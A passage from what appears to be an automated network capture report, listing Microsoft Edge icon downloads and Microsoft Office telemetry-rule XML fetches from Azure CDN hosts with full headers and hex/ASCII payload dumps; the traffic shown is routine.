                                                                                                                                                                                                        70192.168.2.74979613.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:37 UTC425OUTGET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:37 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 1154
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT
                                                                                                                                                                                                        ETag: 0x8DBD5935D5B3965
                                                                                                                                                                                                        x-ms-request-id: dc12cdcd-501e-005d-71e8-459803000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125337Z-1746fd949bd6zq92hC1EWRry48000000018g0000000035wp
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC1154INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        71192.168.2.74979713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:37 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:38 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                        x-ms-request-id: bbae04f8-a01e-0032-80cc-451949000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125338Z-1746fd949bdjrnwqhC1EWRpg28000000019g0000000064ab
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        72192.168.2.74979813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:37 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:38 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                        x-ms-request-id: 71541f9e-801e-0078-2fc7-45bac6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125338Z-1746fd949bd4w8sthC1EWR70040000000120000000002bdu
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        73192.168.2.74979913.107.246.404437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC431OUTGET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1
                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:38 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 1468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT
                                                                                                                                                                                                        ETag: 0x8DBDCB5E23DFC43
                                                                                                                                                                                                        x-ms-request-id: 014ffb60-d01e-004c-08e8-45af18000000
                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                        x-azure-ref: 20241204T125338Z-1746fd949bdmv56chC1EWRypnn00000001cg00000000653t
                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC1468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6
                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        74192.168.2.74980013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:38 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:38 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                        x-ms-request-id: f87bd39b-701e-0097-59cc-45b8c1000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125338Z-1746fd949bdqpttnhC1EWRe1wg00000000zg000000006v7q
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:39 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        75192.168.2.74980113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:39 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:39 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                        x-ms-request-id: 901a75be-701e-0053-76cb-453a0a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125339Z-1746fd949bdl6zq5hC1EWRf3ws00000000yg0000000048se
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        76192.168.2.74980213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:40 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                        x-ms-request-id: 5cfda45f-901e-00ac-3dce-45b69e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125340Z-1746fd949bdjrnwqhC1EWRpg28000000016g00000000aucv
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        77192.168.2.74980313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:40 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                        x-ms-request-id: 2accf417-001e-0014-64cb-455151000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125340Z-1746fd949bd4w8sthC1EWR70040000000120000000002bgb
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        78192.168.2.74980413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:40 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:41 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                        x-ms-request-id: 6fdb675e-b01e-0070-05ce-451cc0000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125341Z-1746fd949bddgsvjhC1EWRum2c00000001fg000000007t2h
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:41 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        79192.168.2.74980513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:41 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:41 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
